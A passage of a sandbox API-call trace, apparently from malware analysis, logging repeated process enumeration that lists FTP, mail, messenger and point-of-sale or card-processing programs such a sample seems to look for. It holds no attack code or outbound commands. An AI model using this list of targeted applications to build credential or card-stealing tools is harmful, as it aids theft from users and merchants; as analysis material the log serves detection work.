th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0243.133] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0243.136] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0243.139] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0243.142] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0243.145] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0243.169] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0243.171] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0243.173] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0243.176] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0243.178] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0243.180] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0243.214] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0243.216] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0243.218] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0243.221] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0243.223] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0243.225] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0243.227] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0243.228] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0243.230] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0243.232] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0243.234] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0243.236] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0243.238] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0243.240] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0243.242] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0243.244] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0243.246] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0243.257] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0243.258] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0243.260] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0243.262] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.264] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0243.267] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.269] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.270] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0243.272] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.274] Process32Next (in: hSnapshot=0x22dc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0243.276] CloseHandle (hObject=0x22dc) returned 1 [0243.276] Sleep (dwMilliseconds=0x64) [0243.411] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22f0 [0243.428] Process32First (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.430] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.433] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.435] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.437] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.440] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.445] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.447] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.493] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.496] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.498] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.500] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.503] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.505] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.507] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.510] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.512] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.514] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.517] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.519] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.523] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0243.525] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.528] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0243.608] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.612] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0243.614] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0243.617] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0243.619] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0243.622] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0243.624] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0243.627] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.630] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.632] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0243.636] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.638] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.641] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.687] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0243.697] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.700] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0243.702] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0243.704] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0243.707] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0243.709] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0243.712] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0243.714] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0243.717] Process32Next (in: hSnapshot=0x22f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, 